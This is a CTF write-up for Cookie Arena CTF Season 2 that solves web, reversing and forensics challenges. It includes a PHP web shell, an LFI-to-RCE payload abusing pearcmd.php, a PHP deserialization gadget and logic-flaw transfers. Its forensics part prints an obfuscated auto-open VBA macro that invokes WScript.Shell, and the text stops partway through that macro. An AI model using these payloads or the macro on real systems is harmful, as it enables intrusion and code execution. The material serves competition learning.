![](https://hackmd.io/_uploads/rJJpnHtKh.png)

# Web

## Be Positive

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/be-positive

Instead of transferring a normal amount, transfer a negative amount.

![](https://hackmd.io/_uploads/H1YvcztYh.png)

![](https://hackmd.io/_uploads/r1S_czKYh.png)

## Slow Down

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/slow-down

Transfer with `amount=111111111+1`.

![](https://hackmd.io/_uploads/SkgqW2zKKh.png)

![](https://hackmd.io/_uploads/ByWN2fKK2.png)

## Youtube Downloader

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/youtube-downloader

![](https://hackmd.io/_uploads/SkXYoztFh.png)

![](https://hackmd.io/_uploads/rJHqiGFYn.png)

## Passcode

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/pass-code

Deobfuscate the following JS snippet:

![](https://hackmd.io/_uploads/ByfvnzKK2.png)

Running it through the tool at https://deobfuscate.relative.im/ reveals the key.

![](https://hackmd.io/_uploads/HyHFnGtK3.png)

![](https://hackmd.io/_uploads/rJDjnzFK2.png)

## Magic Login

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/magic-login

Log in with any username; the password is one of the strings that produce a magic hash, listed at [this link](https://github.com/spaze/hashes/blob/master/sha256.md).

![](https://hackmd.io/_uploads/H19VTfFY2.png)

Upload a shell with the following content:

```php
<?php echo system($_GET['cmd']);?>
```

![](https://hackmd.io/_uploads/H1XqTzYK2.png)

## Magic Login Harder

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/magic-login-harder

Refer to the following link to create two different base64 strings that have the same MD5 hash:
https://stackoverflow.com/questions/1756004/can-two-different-strings-generate-the-same-md5-hash-code#:~:text=the+paper

```
$ echo '0e306561559aa787d00bc6f70bbdfe3404cf03659e704f8534c00ffb659c4c8740cc942feb2da115a3f4155cbb8607497386656d7d1f34a42059d78f5a8dd1ef' | xxd -r -p | base64
-> DjBlYVWap4fQC8b3C73+NATPA2WecE+FNMAP+2WcTIdAzJQv6y2hFaP0FVy7hgdJc4ZlbX0fNKQg
WdePWo3R7w==
$ echo '0e306561559aa787d00bc6f70bbdfe3404cf03659e744f8534c00ffb659c4c8740cc942feb2da115a3f415dcbb8607497386656d7d1f34a42059d78f5a8dd1ef' | xxd -r -p | base64
-> DjBlYVWap4fQC8b3C73+NATPA2WedE+FNMAP+2WcTIdAzJQv6y2hFaP0Fdy7hgdJc4ZlbX0fNKQg
WdePWo3R7w==
```

![](https://hackmd.io/_uploads/B1kwRMKF3.png)

In `admin.php`, LFI is possible through the `file` parameter.

![](https://hackmd.io/_uploads/S1PsCMFtn.png)

Use the following payload to write a shell into `/tmp/..`:

```
file=/usr/local/lib/php/pearcmd.php&+config-create+/<?=system($_GET['cmd']);?>+/tmp/shell.php
```

However, special characters get encoded, so the PHP code has to be base64-encoded:

```
file=/usr/local/lib/php/pearcmd.php&+config-create+/PD89c3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4+/tmp/shell.php
```

![](https://hackmd.io/_uploads/SkvwkmFYn.png)

When using the LFI to include `/tmp/shell..php`, also add the `convert.base64-decode` wrapper.

![](https://hackmd.io/_uploads/HJssJQFY3.png)

![](https://hackmd.io/_uploads/r1A6J7Kth.png)

## Suck it

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/suck-it

Reading the source code, we find this snippet:

![](https://hackmd.io/_uploads/ryAVl7Kth.png)

Calling `force disconnect` returns the `sessionID` of the given `userID` through the line `socket.emit(targetSocket.sessionID)` (the key is hard-coded).

We already know that the admin's `userID` is `ADMIN`.

![](https://hackmd.io/_uploads/rJ-jgQtth.png)

Call `force disconnect` to obtain the admin's session.

![](https://hackmd.io/_uploads/rk-eZmFFh.png)

Put this session into localStorage and chat with the admin's sweetheart.

![](https://hackmd.io/_uploads/By9f-QKFh.png)

## Video Link Extractor

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/video-link-extractor

If the host being extracted is `localhost`, the code handles it as follows:

![](https://hackmd.io/_uploads/rktjZQYYn.png)

Abuse this to reach the `redirect` in `index.php`.

![](https://hackmd.io/_uploads/BJSTZmFt2.png)
![](https://hackmd.io/_uploads/HJ89zQFYn.png)

![](https://hackmd.io/_uploads/SJo9fXKYn.png)

The untrusted data is the response we return, which then gets unserialized.

![](https://hackmd.io/_uploads/Byjpz7tK2.png)

In addition, on `__wakeup` the `Utils` object calls `$this->_file`.

![](https://hackmd.io/_uploads/BJWx77Yt2.png)

Script to generate the serialized data:

```php
<?php
class Utils {
    public $_file = "php://filter/convert.base64-encode/resource=flag.php";
};
echo(serialize(new Utils()));
?>
```

Put the script's output into the webhook's response.

![](https://hackmd.io/_uploads/HkuR4mYK3.png)

![](https://hackmd.io/_uploads/Sk3TNQYYn.png)

![](https://hackmd.io/_uploads/S1cJHXFKn.png)

# Rev

## Pyreverse

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/pyrevese

Use `pyinstxtractor` to produce a folder containing the `.pyc` files.
Then use Uncompyle6 or [Decompiler Tools](https://www.decompiler.com/) to decompile `pyreverse.pyc`.
Result:

```python
import base64


def reverse_string(s):
    return s[::-1]


def scramble_flag(flag):
    # Shift characters at even indexes up by one and at odd indexes down by one.
    scrambled = ''
    for i, char in enumerate(flag):
        if i % 2 == 0:
            scrambled += chr(ord(char) + 1)
            continue
        scrambled += chr(ord(char) - 1)
    return scrambled


def main():
    # The flag is stored base64-encoded in the binary.
    secret_flag = scramble_flag(reverse_string(base64.b64decode('Q0hIe3B5dGhvbjJFeGlfUmV2ZXJzZV9FTmdpbmVyaW5nfQ==')).decode())
    print('Welcome to PyReverser!')
    print('Please enter a word or phrase:')
    user_input = input()
    generated_value = scramble_flag(reverse_string(user_input.upper()))
    print('Generated value:', generated_value)
    print('Can you find the hidden flag?')
    reversed_flag = reverse_string(secret_flag)
    print('Reversed flag:', reversed_flag)


if __name__ == '__main__':
    main()
```

![](https://hackmd.io/_uploads/HkQVJbYYn.png)

## Jump

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/jump

Jump to address `401500`.

![](https://hackmd.io/_uploads/SJTBReYF2.png)

`4199680` is `0x401500` in hexadecimal.

![](https://hackmd.io/_uploads/SkV5RxYYh.png)

## Rev1

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/rev1

The function that processes the input to get the flag:

![](https://hackmd.io/_uploads/HyA8yWYYn.png)

![](https://hackmd.io/_uploads/BJbOk-tF2.png)

Use a script to solve the system of equations in 14 unknowns:

```python
from z3 import *

solver = Solver()
# One 32-bit unknown per flag character.
v = [BitVec(f'x{i}', 32) for i in range(14)]
equations = [
    0x6E * v[0] + 0x1C3 * v[1] + 0x348 * v[2] + 0x1F8 * v[3] - 0x357 * v[4] + 0x46 * v[5] - 0x16F * v[6] - 0x2FE * v[7] + 0x17A * v[8] + 0x15A * v[9] - 0x326 * v[10] - 0x190 * v[11] + 0x129 * v[12] + 0x2ED * v[13] == 0x29CB,
    0x2A * v[0] + 0x3B2 * v[1] + 0x2C1 * v[2] + 0x23A * v[3] - 0x3D1 * v[4] + 0x152 * v[5] + 0x221 * v[6] - 0x2FC * v[7] - 0x0DF * v[8] - 0x36F * v[9] + 0x1A2 * v[10] + 0x179 * v[11] + 0x284 * v[12] - 0x64 * v[13] == 0x0F0ED,
    0x328 * v[0] + 0x3CD * v[1] + 0x3CC * v[2] + 0x329 * v[3] + 0x0EA * v[4] - 0x1A * v[5] + 0x12B * v[6] - 0x2E * v[7] - 0x337 * v[8] + 0x262 * v[9] + 0x37 * v[10] - 0x0A4 * v[11] + 0x383 * v[12] + 0x2D5 * v[13] == 0x66098,
    0x66 * v[0] - 0x3C9 * v[1] - 0x0C0 * v[2] - 0x0BD * v[3] - 0x9D * v[4] + 0x2D1 * v[5] - 0x299 * v[6] + 0x38E * v[7] + 0x15 * v[8] - 0x14E * v[9] + 0x280 * v[10] + 0x0E1 * v[11] - 0x128 * v[12] + 0x50 * v[13] == 0x6CE4,
    0x2ED * v[0] + 0x8A * v[1] - 0x155 * v[2] - 0x8C * v[3] - 0x239 * v[4] + 0x259 * v[5] - 0x286 * v[6] - 0x1DA * v[7] + 0x154 * v[8] - 0x196 * v[9] + 0x97 * v[10] + 0x26D * v[11] + 0x3E0 * v[12] - 0x1EB * v[13] == 0x150DD,
    0x46 * v[0] - 0x2DF * v[1] + 0x243 * v[2] + 0x78 * v[3] - 0x0EE * v[4] + 0x99 * v[5] - 0x0C5 * v[6] - 0x0EB * v[7] - 0x0AE * v[8] + 0x28F * v[9] - 0x65 * v[10] + 0x20B * v[11] - 0x147 * v[12] + 0x3C2 * v[13] == 0x1E68B,
    0x264 * v[0] + 0x2BE * v[1] + 0x3B5 * v[2] - 0x1D3 * v[3] - 0x8 * v[4] - 0x150 * v[5] + 0x3C1 * v[6] - 0x3E4 * v[7] - 0x58 * v[8] - 0x19C * v[9] + 0x3AA * v[10] + 0x261 * v[11] - 0x17F * v[12] - 0x167 * v[13] == 0x18490,
    0x0B3 * v[0] - 0x63 * v[1] - 0x0E0 * v[2] + 0x24 * v[3] + 0x37C * v[4] + 0x0AA * v[5] + 0x33 * v[6] - 0x11E * v[7] - 0x13D * v[8] + 0x139 * v[9] + 0x3DC * v[10] - 0x14C * v[11] + 0x2DD * v[12] + 0x2B3 * v[13] == 0x3CC54,
    0x102 * v[0] + 0x115 * v[1] + 0x0D3 * v[2] + 0x0DC * v[3] + 0x3A1 * v[4] - 0x35C * v[5] - 0x0ED * v[6] + 0x141 * v[7] - 0x19C * v[8] - 0x2B6 * v[9] + 0x3CC * v[10] + 0x3AA * v[11] + 0x24B * v[12] + 0x1B9 * v[13] == 0x45670,
    0x3C4 * v[0] + 0x305 * v[1] - 0x0A9 * v[2] + 0x87 * v[3] - 0x0E6 * v[4] + 0x30 * v[5] + 0x20F * v[6] - 0x3D0 * v[7] - 0x94 * v[8] - 0x2CC * v[9] + 0x56 * v[10] + 0x224 * v[11] + 0x1B5 * v[12] + 0x183 * v[13] == 0x21A0F,
    0x256 * v[0] + 0x157 * v[1] + 0x181 * v[2] - 0x306 * v[3] - 0x243 * v[4] - 0x9 * v[5] - 0x373 * v[6] - 0x1A3 * v[7] + 0x223 * v[8] + 0x200 * v[9] - 0x365 * v[10] - 0x56 * v[11] + 0x1B6 * v[12] - 0x39C * v[13] == 0x0FFFE3896,
    0x0A3 * v[0] + 0x2B2 * v[1] + 0x22D * v[2] + 0x3D6 * v[3] - 0x9A * v[4] - 0x76 * v[5] - 0x2A0 * v[6] + 0x63 * v[7] + 0x373 * v[8] + 0x15 * v[9] - 0x3B9 * v[10] + 0x214 * v[11] - 0x232 * v[12] + 0x225 * v[13] == 0x22874,
    0x151 * v[0] + 0x153 * v[1] + 0x25F * v[2] - 0x187 * v[3] - 0x2AC * v[4] + 0x1CC * v[5] - 0x155 * v[6] - 0x2F5 * v[7] - 0x22D * v[8] + 0x17B * v[9] - 0x377 * v[10] - 0x0B2 * v[11] - 0x294 * v[12] - 0x2CE * v[13] == 0x0FFFBEC4D,
    0x2AA * v[0] + 0x95 * v[1] + 0x83 * v[2] + 0x25B * v[3] - 0x77 * v[4] - 0x2E1 * v[5] + 0x39D * v[6] + 0x251 * v[7] + 0x0A2 * v[8] - 0x27D * v[9] + 0x268 * v[10] + 0x2F9 * v[11] + 0x14 * v[12] - 0x115 * v[13] == 0x3C5E6
]
for equation in equations:
    solver.add(equation)

if solver.check() == sat:
    model = solver.model()
    solution = [model.evaluate(i).as_long() for i in v]
    print(f'{solution}')
    # Each solved value is the character code of one flag character.
    flag = ""
    for i in solution:
        flag += chr(i)
    print(flag)
else:
    print("no solution")
```

![](https://hackmd.io/_uploads/r1Q61WtY2.png)

![](https://hackmd.io/_uploads/r1oRkWKY3.png)

# For

## Tin học văn phòng (Office Computing)

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/tin-hoc-van-phong-co-ban

```
olevba Challenge.doc
```
![](https://hackmd.io/_uploads/BJdOebFth.png)

## Sổ đăng ký (Registry)

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/so-dang-ky

View it with `Registry View`.

![](https://hackmd.io/_uploads/SJRJ-WKKn.png)

We get the base64 string `TVFva4JAGP8qh7hxx/IwzbaSBZtsKwiLGexFhJg+pMs09AmL6rvP03S9uoe739/nZD+OIEHySmwolNn6F3wkzilH2HEbkDupvwXM+cKaWxWSSt2Bxrv9F64ZOteepU5vYOjMlHPMwNuVQnItyb8AneqOMnO5PiEsVytZnHkJUjnvG4ZuXB7O6tUswigGSuVI0Gsh/g1eQGt8h6gdUo98CskGQ8aIkgBR2dmUAw+9kkfvCiiL0x5sbwdNlQUckb851mTykfhpECUbdstXjo2LMIlEE0iCtedvhWgER1I7aKPHLrmQ2QGVmkbuoFoVvOE9Eckaj8+26vbcTeomqptjL3OLUM/0q1Q+030RMD73MBTYEZFuSmUMYbpEERduSVfDYZW8SvwuktJ/33bx/CeLEGirU7Zp52ZpLfYzPuQhZVez+SsrTnOg7A8=`

Decode it with [CyberChef](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)Raw_Inflate(0,0,'Adaptive',false,false)).

![](https://hackmd.io/_uploads/ByYAWWtt3.png)

## Báo cáo dang dở (Unfinished Report)

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/bao-cao-dang-do

![](https://hackmd.io/_uploads/HJalQZYK2.png)

We spot this file:

![](https://hackmd.io/_uploads/rkWX7Wttn.png)

Dumpfile

![](https://hackmd.io/_uploads/BkRU7ZKKh.png)

Binwalk

![](https://hackmd.io/_uploads/SJi6QZYFh.png)

Extraction yields a folder like this:

![](https://hackmd.io/_uploads/rJJkEbKK3.png)

The flag is in `/word/media/image2.png`.

![](https://hackmd.io/_uploads/HJdxNWFYn.png)

## TrivialFTP

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/trivial-ftp

In UDP stream 26, the data contains the header of a PDF file.
Reading its packets, we work out that the data we need to extract is at `udp.dstport == 58813`.
In this challenge TFTP uses netascii mode, which differs from plain ASCII as follows:

```
netascii: 0D0A is equivalent to 0A in ASCII
netascii: 0D00 is equivalent to 0D in ASCII
```

So we need to replace `0D0A` and `0D00` to restore the correct format.

Script:

```python
from pyshark import FileCapture
from binascii import unhexlify

packets = FileCapture(
    "TrivialFTP.pcapng",
    use_json=True,
    decode_as={"udp.port==51397": "tftp"}
)
# Concatenate the colon-separated hex payload of every TFTP data packet.
result = ''
for pkt in packets:
    if hasattr(pkt, 'tftp'):
        if hasattr(pkt, 'data'):
            result += pkt.data.data
print(result)
result = unhexlify(result.replace(':', ''))
print(result)
# Undo the netascii encoding: CR LF -> LF first, then CR NUL -> CR.
result = result.replace(b'\x0d\x0a', b'\x0a')
result = result.replace(b'\x0d\x00', b'\x0d')
with open('data.pdf', 'wb') as f:
    f.write(result)
```

![](https://hackmd.io/_uploads/SkE3NbKt2.png)

## Under Control

Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/under-control

There is a suspicious Microsoft Excel file.

![](https://hackmd.io/_uploads/Hkn25VYth.png)

Use oletools and olevba:

```bash
$olevba Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi\(1\).xls
olevba 0.60.1 on Python 3.10.6 - http://decalage.info/python/oletools
===============================================================================
FILE: Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi(1).xls
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi(1).xls - OLE stream: '_VBA_PROJECT_CUR/VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
VBA MACRO Sheet1.cls
in file: Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi(1).xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1.vba
in file: Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi(1).xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Auto_Open()
Workbook_Open
End Sub
Sub AutoOpen()
Workbook_Open
End Sub
Sub WorkbookOpen()
Workbook_Open
End Sub
Sub Document_Open()
Workbook_Open
End Sub
Sub DocumentOpen()
Workbook_Open
End Sub
Function
ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨(µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨) ¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»· = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãä娶§Ú¥" »¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢ = "ãXL1lYU~Ùä,Ca²ZfÃ@dO-cq³áÕsÄJV9AQnvbj0Å7WI!RBg§Ho?K_F3.Óp¥ÖePâzk¶ÛNØ%G mÜ^M&+¡#4)uÀrt8(ÒSw|T*Â$EåyhiÚx65Dà¿2ÁÔ" For y = 1 To Len(µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨) ¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬¯¨³³¿¯© = InStr(¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·, Mid(µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨, y, 1)) If ¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬¯¨³³¿¯© > 0 Then ¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®« = Mid(»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢, ¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬¯¨³³¿¯©, 1) ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» = ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» + ¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®« Else ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» = ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» + Mid(µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨, y, 1) End If Next ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨ = 
¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» For ³§½¢º¹¸°¾»´¦§¢·¬»´¦³²¦¦·°¶¥°¯¾µ·§½µº¦¶»¹²¥¦¥·²¢¥³°§°¹¾¾£½©¼°¥«ª§¡¹¶° = 1 To Len(®¶®¾ª¼¿¢·¥»°¾£º¤¿º·¡¦ª¹¹¾´°¢²¶©»°´¢«°µ¸¶¥¤·«½¿¢´¹º¡º»º¸®µ»³¸µ»¦¦½¨¾¾¨¦²) ®¶®¾ª¼¿¢·¥»°¾£º¤¿º·¡¦ª¹¹¾´°¢²¶©»°´¢«°µ¸¶¥¤·«½¿¢´¹º¡º»º¸®µ»³¸µ»¦¦½¨¾¾¨¦² = ³§½¢º¹¸°¾»´¦§¢·¬»´¦³²¦¦·°¶¥°¯¾µ·§½µº¦¶»¹²¥¦¥·²¢¥³°§°¹¾¾£½©¼°¥«ª§¡¹¶° Next For ¥½µ©¡»¡·¤¼¶µ¢¾·½¼¾®¦»»¼¬§ª¦·°¹·³¹¸¤µ³³¡¢£§´¤´¹¨´¡¾¦¬°¹¦¼¥°¡³» = 2 To Len(£©©³¶º©«®®·º¿¿°µ·¡º·«½ª¾¢¢µ¥¹¾²ª¤°¥©½®¥³µ¯¶¹¹´·¹³½²µ£²·¬·¿³¤¹´¨¢º§¯²¦) £©©³¶º©«®®·º¿¿°µ·¡º·«½ª¾¢¢µ¥¹¾²ª¤°¥©½®¥³µ¯¶¹¹´·¹³½²µ£²·¬·¿³¤¹´¨¢º§¯²¦ = 2 Next For »´¦¾¨¶¶½»¿º©³¬µ³°¶¢µ¼²¢°·¸¤¾¨»£¼¡»¥¹¼¤·©©³¹§¾¸¢·¤·¼ºµ£· = 3 To Len(»¶ª¨½©ª¾»¼§µ¨®º¾¢°¦»»¬¥§»¡¬·»¥¾¥¤½°·¾¢²³¡¹¾³¢µ¾·¹«¬¸¼´³£¥°µ»«½°®¸) »¶ª¨½©ª¾»¼§µ¨®º¾¢°¦»»¬¥§»¡¬·»¥¾¥¤½°·¾¢²³¡¹¾³¢µ¾·¹«¬¸¼´³£¥°µ»«½°®¸ = »´¦¾¨¶¶½»¿º©³¬µ³°¶¢µ¼²¢°·¸¤¾¨»£¼¡»¥¹¼¤·©©³¹§¾¸¢·¤·¼ºµ£· Next For ¹®µ´¾¥»³ºª´¡¹®¶¶®¦·³«¢¢¢¹µ¹½¸¦§¥§·°°¡µ¼¤¿©¦¸£¥¥¹¦¶¨¹«©§µ¡´²·°º¢·¡¸²µ¤°²³¯£«¶£ = 4 To Len(´³®½£¼µ·©¡¤¨®º²§¿»²¹£°»¦¾¹²²³¡¨«¯°»³¸¢»¹²£»´£¬¦º¸¸³¾½¨¡º¥¬¥«¹·§¶¶°¦«¹¥¤·) ´³®½£¼µ·©¡¤¨®º²§¿»²¹£°»¦¾¹²²³¡¨«¯°»³¸¢»¹²£»´£¬¦º¸¸³¾½¨¡º¥¬¥«¹·§¶¶°¦«¹¥¤· = 2 Next End Function Sub Workbook_Open() Dim ¹·³«»½¦¨¬¢¸°¤¼¾£¬»¢¾´¢¢µ¾¡¥»»«·¸»µ´¾¼¶»²¥§©¥¥¾¿¼¿²µ°¤²£¹´¶§ As Object Dim ¦¡º¾¿°®¹½º°¡£¿¡¢³´º¥¦²¤°°·¥®½½¡¶«¥¸¹«©·¬°·®¶£³¬§§¹°«µ©¹¢´¥ª¾¾¸»¹©§²·°¢ª¸¢£¡ As String Dim ¤¸¿º«¡¬¡°µ²¢¹¾¿¡¼²¥¾®¨¶µ»¾«º½¼»ª²¢¾ª¤»¹¬»¾»¸¤µµ°¡§¬¿§¢¥§¥£¶¢¥©¨ As String Dim §»¶¬¡¦¹³¾¸¸³££¹´´¸³¥¦´¢¹¥··£°¿²»º¶°°¥©²¢°¾ª«°©«®·½½··´®¹°µµ©½½§¥·°»¢¼¼´¡¦¡«¹ As String Dim ¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ As Integer ¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ = Chr(50) + Chr(48) + Chr(48) Set ¹·³«»½¦¨¬¢¸°¤¼¾£¬»¢¾´¢¢µ¾¡¥»»«·¸»µ´¾¼¶»²¥§©¥¥¾¿¼¿²µ°¤²£¹´¶§ = CreateObject("WScript.Shell") ¦¡º¾¿°®¹½º°¡£¿¡¢³´º¥¦²¤°°·¥®½½¡¶«¥¸¹«©·¬°·®¶£³¬§§¹°«µ©¹¢´¥ª¾¾¸»¹©§²·°¢ª¸¢£¡ = ¹·³«»½¦¨¬¢¸°¤¼¾£¬»¢¾´¢¢µ¾¡¥»»«·¸»µ´¾¼¶»²¥§©¥¥¾¿¼¿²µ°¤²£¹´¶§.SpecialFolders("AppData") Dim 
¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼ Dim ´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦ Dim ¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬¯¨³³¿¯©¶ Dim ³§½¢º¹¸°¾»´¦§¢·¬»´¦³²¦¦·°¶¥°¯¾µ·§½µº¦¶»¹²¥¦¥·²¢¥³°§°¹¾¾£½©¼°¥«ª§¡¹¶° As Long Dim ¥½µ©¡»¡·¤¼¶µ¢¾·½¼¾®¦»»¼¬§ª¦·°¹·³¹¸¤µ³³¡¢£§´¤´¹¨´¡¾¦¬°¹¦¼¥°¡³» As String Dim ¿¨¡©§¾¡º·¼½µ¡®¾¥¼½«¹´¥¥¶²°»¤¡·»°¬£°¿¥§¬¸©º¢¾¥·´£¹¥¡½¬¸ª´º°»§¬¥¡£¢¦»·¶ As Long Dim »¶ª¨½©ª¾»¼§µ¨®º¾¢°¦»»¬¥§»¡¬·»¥¾¥¤½°·¾¢²³¡¹¾³¢µ¾·¹«¬¸¼´³£¥°µ»«½°®¸ As String Dim »´¦¾¨¶¶½»¿º©³¬µ³°¶¢µ¼²¢°·¸¤¾¨»£¼¡»¥¹¼¤·©©³¹§¾¸¢·¤·¼ºµ£· As Long Dim 